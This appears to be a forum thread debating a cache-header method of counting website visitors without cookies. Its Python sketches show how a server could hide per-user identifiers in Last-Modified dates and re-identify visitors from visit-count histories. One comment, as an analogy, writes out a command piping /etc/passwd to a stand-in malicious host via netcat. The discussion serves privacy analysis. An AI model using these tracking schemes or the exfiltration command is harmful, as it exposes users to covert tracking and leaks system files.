Counting is not the same as tracking. The technique proposed would in most cases be useless for trying to distinguish individuals, much less identify them. It's the computer equivalent of the person standing out in front of Costco with a clicker counter.
In principle, screen resolution would in most cases be useless for trying to distinguish individuals. After all, it wouldn't even distinguish the underlying hardware, let alone a user of that hardware. But given omnipresent tracking, it's one more bit that can be used to identify you.
In addition, your comment shows a severe lack of imagination. Suppose I'm a malicious server who wishes to track users.
* For each new user, select a random "last-modified" date. Now, I can clearly distinguish between multiple different users, because "1985-01-01T00:00:10" is probably the 10th visit from whoever was given "1985-01-01T00:00:00" on their first visit.
* If I have too many users for the above approach to uniquely identify a person, add more cached items. With HTTP/2, both HTTP requests would use the same TCP connection, so I can correlate the requests together.
And, bam. That goes from "useless for trying to distinguish individuals, much less identify them" to a unique identifier stored in the cache invalidation dates.
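To make that concrete, here is a rough sketch of how such a server might pack an identifier and a visit counter into the date. Everything named here (`EPOCH`, `SLOT_SECONDS`, `header_for`, `decode`, `handle_return_visit`) is made up for illustration, and the fixed-size slot per user is just one possible encoding, not something from the article.

```python
from datetime import datetime, timedelta, timezone
from email.utils import format_datetime, parsedate_to_datetime
from typing import Tuple

EPOCH = datetime(1985, 1, 1, tzinfo=timezone.utc)  # arbitrary base date
SLOT_SECONDS = 1000  # hypothetical: seconds reserved per user (caps counted visits)

def header_for(user_slot: int, return_visits: int) -> str:
    """Build a Last-Modified value that hides (user_slot, return_visits) in the date."""
    offset = user_slot * SLOT_SECONDS + return_visits
    return format_datetime(EPOCH + timedelta(seconds=offset), usegmt=True)

def decode(if_modified_since: str) -> Tuple[int, int]:
    """Recover (user_slot, return_visits) from the date the browser echoes back."""
    seen = parsedate_to_datetime(if_modified_since)
    offset = int((seen - EPOCH).total_seconds())
    return divmod(offset, SLOT_SECONDS)

def handle_return_visit(if_modified_since: str) -> Tuple[int, int, str]:
    """Identify the returning user and hand back a date bumped by one second."""
    user_slot, prior = decode(if_modified_since)
    visits = prior + 1
    return user_slot, visits, header_for(user_slot, visits)
```

A browser that caches the resource and later sends the date back in If-Modified-Since is effectively handing over a cookie, which is the point being made above.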
That is a different technique that uses the same medium of storage. When I say "this technique" I'm referring to specifically what was discussed in the article.
"Evil tracking companies will do evil things with any protocol features you give them" is already well known and there's not much to say about it that hasn't been said. What OP is actually doing is clever and new to me.
I agree that it is clever, and it is new to me as well. However, saying that an obvious extension to a technique (posted by multiple people independently, no less) is a different technique altogether and therefore not germane is going a bit far.
If I post a privilege escalation exploit that allows me to execute "cat /etc/sudoers", and somebody points out that it could also be used to execute "cat /etc/passwd | netcat malicious-remote-server.com", that's an obvious extension of the same technique. This is the same, where the same technique may be used for more intrusive attacks than are performed in the initial proof of concept.
This kind of attack isn't new, though. Trackers have been using side-channel tracking forever now. A quick search shows that this exact side-channel tracking vulnerability was discussed in the year 2000 [0].
I'm not saying the technique isn't similar: I just object to people dogpiling on OP because other people can and do abuse the same header in nefarious ways. It's not constructive, just a pointless attack on someone who's actually trying to improve privacy.
I wasn't attempting to dogpile, and am sorry if it came across that way. I agree that this scheme would, if used as a replacement for cookies in the manner described by the OP, be a strict improvement on the current state. That's the first step in evaluating a proposed privacy improvement.
However, that is only sufficient if you already trust the operator of the server to maintain that same implementation. That may work for some threat models, such as a website that is currently run by a trusted individual that may later be bought by a malicious actor, but it isn't sufficient in all cases. Across the entire ecosystem, there's a sequence of questions that needs to be asked.
1. How would a non-malicious actor implement the proposed system?
2. What is the minimal amount of information that must be provided for a non-malicious actor to benefit from the proposed system?
3. What could a malicious actor do with that minimal amount of information?
4. If a malicious actor could use this information, are there additional steps the user can take to mitigate those effects?
Together, these questions help to predict the effects of the proposed implementation becoming the standard. Applying it to this article:
1. As described in the original post.
2. The browser must cache files according to the cache policy requested, and the browser provides accurate information about its cache for subsequent requests.
3. Answered in previous comments: malicious actors could use this to reproduce the same information as is stored in cookies.
4. I'm not sure yet, but I'm picturing an approach where the "if-modified-since" header is deliberately varied for some requests, and abnormal results cause the caching policy of that website to be ignored as untrustworthy.
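As a very rough sketch of what the mitigation in point 4 might look like, assuming the browser can replay a request with different dates: probe the server with perturbed "if-modified-since" values and distrust the caching policy if the "last-modified" it returns depends on what was sent. The `fetch` interface, `cache_policy_trustworthy`, and both simulated servers are hypothetical, and no browser is claimed to work this way.

```python
from datetime import datetime, timedelta, timezone
from typing import Callable, Optional, Tuple

# Hypothetical interface: fetch(if_modified_since) -> (status_code, last_modified)
Fetch = Callable[[Optional[datetime]], Tuple[int, Optional[datetime]]]

def cache_policy_trustworthy(fetch: Fetch, cached: datetime) -> bool:
    """Probe with dates older than the cached one; an honest server should
    answer 200 with the same Last-Modified regardless of which probe it saw."""
    probes = [None, cached - timedelta(days=1), cached - timedelta(days=365)]
    seen = set()
    for probe in probes:
        status, last_modified = fetch(probe)
        if status != 200 or last_modified is None:
            return False  # a 304 for a date older than our copy is abnormal
        seen.add(last_modified)
    return len(seen) == 1

RESOURCE_MTIME = datetime(2020, 1, 1, tzinfo=timezone.utc)

def honest_server(ims: Optional[datetime]):
    """Simulated server whose Last-Modified is the file's real modification time."""
    if ims is not None and ims >= RESOURCE_MTIME:
        return 304, None
    return 200, RESOURCE_MTIME

def counting_server(ims: Optional[datetime]):
    """Simulated server that bumps the date on every visit to store state."""
    base = datetime(1985, 1, 1, tzinfo=timezone.utc)
    return 200, (base if ims is None else ims + timedelta(seconds=1))
```

Note that this check cannot tell the benign counter from the article apart from a malicious one, since both make the returned date depend on the date sent. It would only flag that the header is being used to store state at all.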
When people try to figure out what malicious acts could be done, it's moving the conversation from the first two questions and toward the last two questions. It isn't malicious, or reading into the original poster's intentions, but is an attempt to predict what malicious actions will eventually occur, and to implement mitigations as soon as possible.
Of course this technique could be abused by a bad actor. That's true of literally everything in computing. Do you think we should ban encryption because bad people might encrypt stuff?
TFA describes a way to provide basic analytics in a way that completely respects the user's privacy. That's a good thing.
Counting is not tracking, but counting unique visitors requires tracking to know they are unique. If the person outside of Costco is counting unique visitors, they must be tracking who has already visited and who has not. Even if they don't do anything else with that information and forget it each night, it is tracking. The existing abuse of tracking has led to a level of backlash where any tracking is seen through the worst possible lens.
It doesn't require tracking. Tracking would mean I could tell that user x has returned n times. But I have no idea who has returned, only that someone has returned n times.
The person standing outside Costco is counting people by giving them a colored sticker when they walk through the door. If they show up already having one, the counter issues a different color. Who has the stickers is unknown; only the number of stickers distributed in each color is known.
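One way to read the sticker analogy in code, as a minimal sketch: the server keeps only a histogram of "which visit number was this", and the client carries its own counter. The names `visits_by_ordinal` and `record_visit` are made up here, and how the counter travels (a cache date, in the article's case) is left out.

```python
from collections import Counter
from typing import Optional

# Server-side state: how many times each sticker colour has been handed out.
# No per-user records are kept.
visits_by_ordinal: Counter = Counter()

def record_visit(previous_count: Optional[int]) -> int:
    """previous_count is whatever the client echoed back (None means no sticker).
    Returns the new count for the client to carry until its next visit."""
    n = 1 if previous_count is None else previous_count + 1
    visits_by_ordinal[n] += 1
    return n
```

Under this sketch, `visits_by_ordinal[1]` is the number of first-time visitors and `visits_by_ordinal[2]` is the number who came back at least once, while the server never learns which visitor holds which count.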
As has been said, this is not to say the technique couldn't be used for nefarious purposes. In this case, it's not, though.
That's still a form of tracking. It may not be enough to identify unique users in some use cases, but even just knowing that someone has been here n times is enough if the user numbers are low enough that you can identify users by unique values of n and by patterns in n. For example, suppose one user is at 500 and another is at 490, and the second one is logging in daily while the first one hasn't logged in for a few months. You see the 490 go to 491, 492, and so on. Once it has gone from 499 to 500, and a 500 logs on tomorrow and becomes 501, chances are it was the former 490 account that has been logging in daily.
Must admit, I've never thought of "number of times I've visited your site" as PII. Number of times I've visited every site in my browser history, maybe, but not "number of times I've visited this specific site". I'm thinking about it, but I'm not immediately convinced.
That's because you're forgetting the temporal domain. As in GP's example, a count alone may not mean much, but a time series of counts will allow you to uniquely identify a subset of the users.
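A toy sketch of that time-series linking, assuming the server logs a (day, count) pair for every visit: an event showing count n is attached to the chain that last showed n - 1, as long as exactly one chain fits. The function name `link_visits` and the event format are invented for illustration.

```python
from collections import defaultdict
from typing import Dict, List, Tuple

Event = Tuple[int, int]  # (day, visit count reported on that day)

def link_visits(events: List[Event]) -> List[List[Event]]:
    """Group anonymous count events into per-visitor chains where unambiguous."""
    chains: List[List[Event]] = []
    # Maps a count to the chains whose most recent event showed that count.
    ending_at: Dict[int, List[int]] = defaultdict(list)
    for day, count in sorted(events):
        candidates = ending_at[count - 1]
        if len(candidates) == 1:
            idx = candidates.pop()      # exactly one chain could have produced this
        else:
            idx = len(chains)           # new visitor, or ambiguous: start a new chain
            chains.append([])
        chains[idx].append((day, count))
        ending_at[count].append(idx)
    return chains
```

With few users and distinct counts, most events land in exactly one chain, which gives the per-visitor visit history that the counts alone were supposed to hide.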
Kinda need one for the other if you want to distinguish different users vs just one user clicking a lot.
You need some kind of identifier to differentiate between different sessions, and the moment you generate that ID, in whatever way, you are tracking the user.
No, you don't need an ID. The article has one implementation that avoids IDs, but here's a simpler one:
Place a cookie HAS_BEEN_ON_SITE=true as soon as someone loads any page.
Voila, your server can now distinguish between users who've been to your site and users who haven't, without being able to tell recurring users apart from each other.
The implementation in the article is fancier, because the cache control headers allow distinguishing this on a page-by-page basis, but it's the same general idea. Don't give the client an ID, just ask the client to tell you if it's been there before.
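For the cookie version, a minimal sketch might look like the following. The `VisitorCounter` class and its fields are hypothetical, the cookie attributes are arbitrary choices, and only the standard library's `http.cookies` parser is used.

```python
from http.cookies import SimpleCookie
from typing import Dict

class VisitorCounter:
    """Counts page loads and first-time visitors without issuing any ID."""

    def __init__(self) -> None:
        self.page_loads = 0
        self.first_time_visitors = 0

    def handle(self, cookie_header: str = "") -> Dict[str, str]:
        """Count one request; return the extra response headers to send."""
        self.page_loads += 1
        cookies = SimpleCookie()
        cookies.load(cookie_header)
        if "HAS_BEEN_ON_SITE" in cookies:
            return {}  # returning visitor: nothing new to set
        self.first_time_visitors += 1
        # Every visitor gets the same value, so the cookie cannot tell them apart.
        return {"Set-Cookie": "HAS_BEEN_ON_SITE=true; Max-Age=31536000; Path=/"}
```

Because the cookie value is identical for everyone, the server learns "new or returning" and nothing else from it.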
Yes, but whether you legally must get consent is a separate question from whether you can count unique visitors while still being unable to tell them apart from each other.
Back in my days we called those "tracking pixels" and it didn't even need a cookie.
That's just not a real problem to solve. If you don't want to track users, just giving each one a unique ID is not a problem as long as you don't store the IDs for future lookup.
The fact remains that, from the client's perspective, the client has no way of telling whether you track them or not, so you can't really prove to the user that you're not tracking them.
Reminder that the GDPR does not care about cookies specifically but about personal data and tracking in general. Using the cache invalidation for tracking does not require any less consent than the equivalent cookie.
However, it does look like the ePrivacy Regulation will clear this specific case up, at least according to Wikipedia:
> The proposal also clarifies that no consent is needed for non-privacy-intrusive cookies improving internet experience (like to remember shopping cart history) or cookies used by a website to count the number of visitors.
It's not like that is a far walk, though. It's the exact same technique, just storing different data.
Respectfully, I feel like this would be like seeing an example of CSS turning a page blue and claiming the technique is useless for turning the page red because that is not the specific example used.
If a bunch of people got up in arms and started complaining because the author of said CSS example hadn't considered that their code could be changed slightly to produce a hate symbol, I'd definitely still jump in and say "but that's not what they were doing!"